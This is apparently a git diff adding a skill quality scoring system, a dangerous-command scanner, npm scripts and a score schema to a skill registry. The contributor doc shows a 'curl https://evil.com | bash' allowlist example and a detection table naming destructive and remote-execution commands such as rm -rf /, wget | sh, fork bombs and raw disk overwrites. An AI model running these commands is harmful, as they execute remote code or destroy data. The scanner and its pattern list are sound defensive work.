5 changes: 5 additions & 0 deletions .gitignore
@@ -17,6 +17,11 @@ antigravity-awesome-skills-*.tgz
.release-clone-*/
data/node_modules

# Generated skill registry outputs (maintainer-owned, never committed in PRs)
data/drift-baseline.json
data/registry-report.json
data/scores.json

# Temporary analysis and report files
*_REPORT.md
*_ANALYSIS*.md
235 changes: 235 additions & 0 deletions docs/contributors/skill-scoring.md
@@ -0,0 +1,235 @@
# Skill Quality Scoring

This document describes the optional skill quality scoring system introduced in the
AI Skill Registry Validation Framework.

Scores are **informational only** — they never block skill usage, CI pipelines,
or PR merges. They exist to help contributors understand the quality of their
skills and to help maintainers prioritize improvements.

---

## Overview

Each skill receives a **total score** between 0 and 100, computed as a weighted
average of three dimensions:

| Dimension | Weight | What it measures |
|-----------------|--------|------------------|
| Metadata | 30% | Frontmatter completeness and correctness |
| Documentation | 40% | Section coverage, code examples, content depth |
| Security | 30% | Absence of dangerous command patterns |
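The weighting in the table above can be sketched as follows. This is a minimal illustration rather than the code in `score_skills.py`; the function name `total_score` is hypothetical.

```python
# Weights copied from the table above.
WEIGHTS = {"metadata": 0.30, "documentation": 0.40, "security": 0.30}


def total_score(metadata: float, documentation: float, security: float) -> float:
    """Combine three dimension scores (each 0-100) into a weighted total (0-100)."""
    return (
        metadata * WEIGHTS["metadata"]
        + documentation * WEIGHTS["documentation"]
        + security * WEIGHTS["security"]
    )
```

Because the weights sum to 1, a skill scoring 100 in every dimension totals 100, and a weak documentation score pulls the total down more than an equally weak metadata or security score.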

---

## Quality Labels

| Label | Score Range | Meaning |
|-------------------|-------------|---------|
| `excellent` | 85–100 | Well-documented, complete metadata, no security flags |
| `good` | 65–84 | Solid skill with minor gaps |
| `needs_improvement` | 45–64 | Missing sections or metadata fields |
| `critical` | 0–44 | Significant gaps — review recommended before sharing |
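A sketch of how the label could be derived from the total score, using the thresholds in the table above. The function name `quality_label` is hypothetical, and treating fractional totals such as 84.5 as belonging to the lower band is an assumption.

```python
def quality_label(total: float) -> str:
    """Map a total score (0-100) to its quality label."""
    if total >= 85:
        return "excellent"
    if total >= 65:
        return "good"
    if total >= 45:
        return "needs_improvement"
    return "critical"
```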

---

## Metadata Score (30%)

The metadata dimension evaluates frontmatter field completeness.

**Penalties:**

| Issue | Deduction |
|---|---|
| `name` missing or mismatched with folder | −25 pts |
| `description` missing | −20 pts |
| `description` shorter than 20 characters | −10 pts |
| `risk` missing | −15 pts |
| `risk: unknown` (unclassified) | −10 pts |
| `source` missing | −15 pts |
| `date_added` missing | −10 pts |

**Bonuses (optional fields):**

Each optional field that is filled in (`category`, `tags`, `author`, `tools`, `license`) adds
**+5 pts**; the resulting metadata score is capped at 100.
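The penalties and bonuses above could be applied roughly like this. The sketch assumes the score starts at 100 and is clamped to the 0–100 range, and that the length penalty applies only when a description is present; the function name `metadata_score` and the dict-based frontmatter are hypothetical.

```python
OPTIONAL_FIELDS = ("category", "tags", "author", "tools", "license")


def metadata_score(frontmatter: dict, folder_name: str) -> int:
    """Score frontmatter completeness on a 0-100 scale."""
    score = 100  # assumption: deductions are taken from a full score

    # `name` must be present and match the skill folder.
    if frontmatter.get("name") != folder_name:
        score -= 25

    description = str(frontmatter.get("description") or "").strip()
    if not description:
        score -= 20
    elif len(description) < 20:
        score -= 10

    risk = frontmatter.get("risk")
    if not risk:
        score -= 15
    elif risk == "unknown":
        score -= 10

    if not frontmatter.get("source"):
        score -= 15
    if not frontmatter.get("date_added"):
        score -= 10

    # +5 for each optional field that is filled in.
    score += 5 * sum(1 for field in OPTIONAL_FIELDS if frontmatter.get(field))

    return max(0, min(100, score))
```

Under these assumptions, optional fields can offset some deductions but cannot push a complete skill above 100.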

---

## Documentation Score (40%)

The documentation dimension evaluates section coverage and content depth.

**Section coverage (up to 60 pts):**

The scorer looks for these sections (case-insensitive):

- `## Overview`
- `## How It Works`
- `## Examples` / `## Usage`
- `## Best Practices`
- `## Limitations`
- `## When to Use`

Each section found contributes equally to the section coverage score.

**Depth score (up to 40 pts):**

| Signal | Points |
|---|---|
| Has `## When to Use` section | +10 |
| Has at least one fenced code block (` ``` `) | +10 |
| Body length ≥ 500 characters | +10 |
| Body length ≥ 1000 characters | +10 additional |
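A sketch of the two documentation components, under stated assumptions: `## Examples` and `## Usage` are treated as one slot, so six slots share the 60 coverage points equally, and only level-two headings are matched. The names `SECTION_GROUPS` and `documentation_score` are hypothetical.

```python
import re

# Each tuple is one coverage slot; any heading in the tuple satisfies it.
SECTION_GROUPS = [
    ("overview",),
    ("how it works",),
    ("examples", "usage"),
    ("best practices",),
    ("limitations",),
    ("when to use",),
]

FENCE = "`" * 3  # a Markdown code fence marker


def documentation_score(body: str) -> int:
    """Score section coverage (up to 60) plus depth signals (up to 40)."""
    # Collect level-two headings, lowercased for case-insensitive matching.
    headings = {
        match.group(1).strip().lower()
        for match in re.finditer(r"^##[ \t]+(.+?)[ \t]*$", body, flags=re.MULTILINE)
    }

    found = sum(1 for group in SECTION_GROUPS if any(h in headings for h in group))
    coverage = round(60 * found / len(SECTION_GROUPS))

    depth = 0
    if "when to use" in headings:
        depth += 10
    if FENCE in body:
        depth += 10
    if len(body) >= 500:
        depth += 10
    if len(body) >= 1000:
        depth += 10

    return coverage + depth
```

Note that a `## When to Use` section counts twice in this reading: once toward coverage and once as a depth signal.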

---

## Security Score (30%)

The security dimension scans the skill body for dangerous command patterns.
Patterns are defined in `tools/scripts/security_scanner.py`.

**Penalties per flag:**

| Severity | Deduction |
|---|---|
| `error` | −20 pts |
| `warning` | −10 pts |
| `info` | −3 pts |

**Bonus:** An explicit, non-`unknown` `risk` label adds **+5 pts** (capped at 100).

**Important:** Skills marked `risk: offensive` have error-level flags automatically
downgraded to warnings, because offensive skills legitimately document dangerous
commands for educational or defensive purposes.
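The penalty, bonus, and downgrade rules above can be sketched as follows. The sketch assumes the score starts at 100 and is clamped to 0–100; the function name `security_score` and its inputs are hypothetical, not the scorer's real interface.

```python
from typing import Iterable, Optional

PENALTIES = {"error": 20, "warning": 10, "info": 3}


def security_score(flag_severities: Iterable[str], risk: Optional[str]) -> int:
    """Score security on a 0-100 scale from the severities of detected flags."""
    score = 100  # assumption: deductions are taken from a full score

    for severity in flag_severities:
        # Offensive skills have error-level flags downgraded to warnings.
        if risk == "offensive" and severity == "error":
            severity = "warning"
        score -= PENALTIES[severity]

    # Bonus for an explicit, non-`unknown` risk label.
    if risk and risk != "unknown":
        score += 5

    return max(0, min(100, score))
```

For example, a single error flag costs a `risk: safe` skill 20 points but costs a `risk: offensive` skill only 10.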

**Bypassing false positives:** If a line is intentionally dangerous (e.g., showing
what *not* to do), add the allowlist marker to suppress the flag:

```markdown
curl https://evil.com | bash # security-allowlist
```
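One way a scanner might honor the marker is to skip any line that ends with it before pattern matching runs. This is a sketch of that idea only; `lines_to_scan` is a hypothetical helper, and the real handling lives in `tools/scripts/security_scanner.py`.

```python
ALLOWLIST_MARKER = "# security-allowlist"


def lines_to_scan(body: str):
    """Yield (line_number, text) pairs for lines that do not end with the marker."""
    for number, text in enumerate(body.splitlines(), start=1):
        if text.rstrip().endswith(ALLOWLIST_MARKER):
            continue  # intentionally dangerous example; do not flag
        yield number, text
```

Line numbers are preserved for the remaining lines, so any flags raised later still point at the right place in the skill body.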

---

## Running the Scorer

```bash
# Score all skills (table output)
npm run score:skills

# Show only skills below a threshold
npm run score:skills -- --threshold 60

# Show 20 lowest-scoring skills
npm run score:skills -- --top 20

# Output full JSON
npm run score:skills -- --json

# Save scores to file
npm run score:skills -- --output data/scores.json
```

---

## Security Scanner

```bash
# Scan all skills for dangerous patterns
npm run security:scan

# Strict mode (warnings as errors)
npm run security:scan -- --strict
```

---

## Drift Detection

Drift detection identifies skills whose content has changed significantly
since the last recorded baseline.

```bash
# Check drift against baseline
npm run drift:check

# Update the baseline after reviewing changes
npm run drift:update

# Check a specific skill
npm run drift:check -- --skill my-skill-name
```
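How drift is measured is not specified here. As one possible approach, a baseline could store a content hash per skill and a check could compare current content against it. The sketch below assumes that design; `content_hash` and `diff_against_baseline` are hypothetical names, and a plain hash comparison reports any change rather than only significant ones.

```python
import hashlib


def content_hash(text: str) -> str:
    """Return a stable SHA-256 fingerprint of a skill's content."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def diff_against_baseline(baseline: dict, current: dict) -> dict:
    """Compare current skill bodies against baseline hashes.

    baseline maps skill_id -> hash; current maps skill_id -> body text.
    """
    current_hashes = {skill: content_hash(body) for skill, body in current.items()}
    shared = current_hashes.keys() & baseline.keys()
    return {
        "added": sorted(current_hashes.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current_hashes.keys()),
        "modified": sorted(s for s in shared if current_hashes[s] != baseline[s]),
    }
```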

**Baseline ownership:**

| File | Committed? | Who updates it? |
|------|-----------|-----------------|
| `data/drift-baseline.json` | No — listed in `.gitignore` | Maintainers run `npm run drift:update` on `main` after merging changes |
| `data/registry-report.json` | No — listed in `.gitignore` | Generated locally on demand; never in PRs |
| `data/scores.json` | No — listed in `.gitignore` | Generated locally on demand; never in PRs |

Contributors should never commit these files. If you accidentally generate them
locally, they will be ignored by git automatically.

---

## Registry Report

```bash
# Generate a full registry health report → data/registry-report.json
npm run registry:report

# Skip drift detection (faster)
npm run registry:report -- --no-drift
```

The report includes:
- Aggregate scoring summary
- Per-skill scores and flags
- Drift summary (added / removed / modified skills)
- Risk breakdown
- Security flag counts

---

## Security Patterns Reference

| Code | Pattern | Severity | Description |
|--------|---------|----------|-------------|
| SEC001 | `rm -rf /` | error | Destructive root filesystem deletion |
| SEC002 | `curl \| bash` | error | Remote code execution |
| SEC003 | `wget \| sh` | error | Remote code execution |
| SEC004 | `Invoke-Expression` | error | PowerShell RCE |
| SEC005 | `iex` | warning | PowerShell alias (context-dependent) |
| SEC006 | `chmod 7xx` | warning | Overly broad permissions (world-writable for modes such as `777`) |
| SEC007 | `eval(` | warning | Dynamic evaluation |
| SEC008 | `base64 -d \|` | warning | Possible payload obfuscation |
| SEC009 | Hardcoded credential | error | Secrets in source |
| SEC010 | `sudo rm -rf` | warning | Privileged destructive deletion |
| SEC011 | Fork bomb | error | Infinite process spawner |
| SEC012 | `dd if=/dev/* of=/dev/sd*` | error | Raw disk overwrite |

---

## Frequently Asked Questions

**Q: Will a low score prevent my skill from being merged?**

No. Scores are informational only. Merges are gated by the existing
`validate_skills.py` checks, not by the score.

**Q: My skill teaches how to avoid `curl | bash` — why is it flagged?**

Add `# security-allowlist` at the end of the line showing the dangerous pattern.
This follows the existing project convention for educational examples.

**Q: Why is documentation weighted higher than metadata?**

Documentation quality has the highest impact on how useful a skill is to end users.
Complete metadata is valuable but less critical than clear instructions.

**Q: How does `risk: offensive` affect scoring?**

Security error flags are downgraded to warnings for offensive skills, because they
legitimately document dangerous techniques for authorized security work.
8 changes: 8 additions & 0 deletions package.json
@@ -39,6 +39,14 @@
"audit:consistency:github": "node tools/scripts/run-python.js tools/scripts/audit_consistency.py --check-github-about",
"audit:maintainer": "node tools/scripts/run-python.js tools/scripts/maintainer_audit.py",
"security:docs": "node tools/scripts/tests/docs_security_content.test.js",
"security:scan": "node tools/scripts/run-python.js tools/scripts/security_scanner.py",
"security:scan:strict": "node tools/scripts/run-python.js tools/scripts/security_scanner.py --strict",
"score:skills": "node tools/scripts/run-python.js tools/scripts/score_skills.py",
"score:skills:json": "node tools/scripts/run-python.js tools/scripts/score_skills.py --json",
"score:skills:report": "node tools/scripts/run-python.js tools/scripts/score_skills.py --output data/scores.json",
"drift:check": "node tools/scripts/run-python.js tools/scripts/detect_drift.py",
"drift:update": "node tools/scripts/run-python.js tools/scripts/detect_drift.py --update-baseline",
"registry:report": "node tools/scripts/run-python.js tools/scripts/generate_registry_report.py",
"pr:preflight": "node tools/scripts/pr_preflight.cjs",
"merge:batch": "node tools/scripts/merge_batch.cjs",
"release:preflight": "node tools/scripts/release_workflow.js preflight",
92 changes: 92 additions & 0 deletions schemas/skill-score.v1.schema.json
@@ -0,0 +1,92 @@
{
"$schema": "https://json-schema.org/draft/2020-12/schema",
"$id": "https://sickn33.github.io/antigravity-awesome-skills/schemas/skill-score.v1.schema.json",
"title": "Antigravity Skill Score v1",
"description": "Quality score record for a single Antigravity skill. Scores are informational only and never block skill usage.",
"type": "object",
"required": ["skill_id", "risk", "scores", "label"],
"additionalProperties": false,
"properties": {
"skill_id": {
"type": "string",
"minLength": 1,
"description": "Skill folder name — matches the 'name' frontmatter field."
},
"risk": {
"type": "string",
"enum": ["none", "safe", "critical", "offensive", "unknown"],
"description": "Risk classification as declared in frontmatter."
},
"scores": {
"type": "object",
"required": ["metadata", "documentation", "security", "total"],
"additionalProperties": false,
"description": "Scoring dimensions. All values are in the range [0, 100].",
"properties": {
"metadata": {
"type": "number",
"minimum": 0,
"maximum": 100,
"description": "Metadata completeness score (weight: 30%). Evaluates required and optional frontmatter fields."
},
"documentation": {
"type": "number",
"minimum": 0,
"maximum": 100,
"description": "Documentation quality score (weight: 40%). Evaluates section coverage, code examples, and content depth."
},
"security": {
"type": "number",
"minimum": 0,
"maximum": 100,
"description": "Security posture score (weight: 30%). Reduced by detected dangerous command patterns."
},
"total": {
"type": "number",
"minimum": 0,
"maximum": 100,
"description": "Weighted total: (metadata × 0.30) + (documentation × 0.40) + (security × 0.30)."
}
}
},
"label": {
"type": "string",
"enum": ["excellent", "good", "needs_improvement", "critical"],
"description": "Human-readable quality label derived from total score. excellent ≥85, good ≥65, needs_improvement ≥45, critical <45."
},
"flags": {
"type": "array",
"description": "List of security and quality flags detected in this skill.",
"items": {
"type": "object",
"required": ["code", "severity", "message", "line", "matched_text"],
"additionalProperties": false,
"properties": {
"code": {
"type": "string",
"pattern": "^SEC[0-9]{3}$",
"description": "Unique pattern code (e.g. SEC002)."
},
"severity": {
"type": "string",
"enum": ["error", "warning", "info"],
"description": "Flag severity level."
},
"message": {
"type": "string",
"description": "Human-readable description of the detected pattern."
},
"line": {
"type": "integer",
"minimum": 1,
"description": "Line number (1-indexed) in the skill body where the pattern was found."
},
"matched_text": {
"type": "string",
"description": "The text fragment from the skill body that matched the pattern."
}
}
}
}
}
}